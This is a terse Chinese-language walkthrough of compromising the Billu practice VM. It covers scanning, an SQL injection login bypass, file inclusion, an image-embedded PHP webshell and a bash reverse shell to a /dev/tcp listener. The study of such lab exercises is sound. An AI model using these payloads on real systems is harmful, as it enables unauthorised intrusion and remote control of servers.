靶场下载链接
将kali和Billu,NAT连接
获取靶场ip
arp-scan -l
使用diesearch进行目录扫描
dirsearch -u " "
查看目录中的信息
打开add.php
打开head.php
打开in,phpinfo()的信息泄露
允许本地文件包含
打开index.php,登录界面,尝试使用万能密码登录(失败)
' or 1=1#
打开phpmy
打开test.php
使用get请求失败
在kali,使用post请求成功
存在文件包含漏洞和文件下载漏洞
使用此请求方式查看一下index.php
发现了登录的逻辑,明白了为什么万能密码会错误
只要在万能密码的后面加一个\就可以了
打开images,图片上传位置
登录
' or 1=1#\
成功登录
show users 显示用户信息,重点有图片
获取到图片上传的路径
右键点击图片,选择在新标签中打开图像
add 添加用户,上传图片
图片马
新建1.php文件写入一句话木马
随便下载一个图片,放在一起
copy 1.png/b + 1.php/a 2.png
将制作好的图片马上传上去
图片马地址http://192.168.31.138/uploaded_images/2.png
制作反弹shell木马文件
show users 点击continue时进行抓包
echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash
将load改为图片马位置,在panel.php后放代码
在kali中监听8888端口
发送到重放器,点击发送,kali中可监听到shell,反弹shell完成